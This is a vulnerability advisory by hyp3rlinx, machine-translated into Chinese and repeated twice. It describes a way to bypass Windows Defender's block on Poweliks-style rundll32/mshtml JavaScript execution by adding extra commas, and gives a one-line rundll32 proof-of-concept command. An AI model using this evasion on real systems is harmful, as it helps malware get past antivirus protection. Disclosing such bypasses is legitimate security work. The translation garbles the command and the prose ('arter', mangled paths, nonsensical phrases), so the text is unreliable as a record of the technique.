[+] Credits: John Page(又名Hyp3rlinx)
[+]网站: hyp3rlinx.altervista.org
[+]源: https://hyp3rlinx.altervista.org/ad...ere.g_mitigation.bypass_bypass_part2.txt2.txt
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Windows Defender
[漏洞类型]
Windows Defender检测缓解旁路
trojanwin32powessere.g
[CVE参考]
N/A。
[安全问题]
trojan.win32/powessere.g/缓解旁路第2部分。
通常,Windows Defender检测并防止Trojanwin32Powessere.g aka“ Powerliks”类型执行,该执行利用Rundll32.exe。尝试执行失败
攻击者通常会获得“访问被拒绝”错误消息。
早在2022年,我就透露了如何通过引用MSHTML的额外路径遍历来轻松绕过这一点,但此后已得到缓解。
但是,我发现了使用多通用'',“将绕过这种缓解措施,并在撰写本文时成功执行。
[参考]
[漏洞/POC]
打开命令提示符作为管理员。
c: \ secrundll32.exe javascript:'\ . \ . \ mshtml,runhtmlapplication'; arter(666)
访问被拒绝。
c: \ secrundll32.exe javascript:'\ . \ . \ mshtml,runhtmlapplication'; arter(666)
多俱乐部,赢得胜利!
[网络访问]
当地的
[严重性]
高的
[披露时间表]
2024: 2月7日公开披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX
[+]网站: hyp3rlinx.altervista.org
[+]源: https://hyp3rlinx.altervista.org/ad...ere.g_mitigation.bypass_bypass_part2.txt2.txt
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Windows Defender
[漏洞类型]
Windows Defender检测缓解旁路
trojanwin32powessere.g
[CVE参考]
N/A。
[安全问题]
trojan.win32/powessere.g/缓解旁路第2部分。
通常,Windows Defender检测并防止Trojanwin32Powessere.g aka“ Powerliks”类型执行,该执行利用Rundll32.exe。尝试执行失败
攻击者通常会获得“访问被拒绝”错误消息。
早在2022年,我就透露了如何通过引用MSHTML的额外路径遍历来轻松绕过这一点,但此后已得到缓解。
但是,我发现了使用多通用'',“将绕过这种缓解措施,并在撰写本文时成功执行。
[参考]
正在加载...
hyp3rlinx.altervista.org
打开命令提示符作为管理员。
c: \ secrundll32.exe javascript:'\ . \ . \ mshtml,runhtmlapplication'; arter(666)
访问被拒绝。
c: \ secrundll32.exe javascript:'\ . \ . \ mshtml,runhtmlapplication'; arter(666)
多俱乐部,赢得胜利!
[网络访问]
当地的
[严重性]
高的
[披露时间表]
2024: 2月7日公开披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX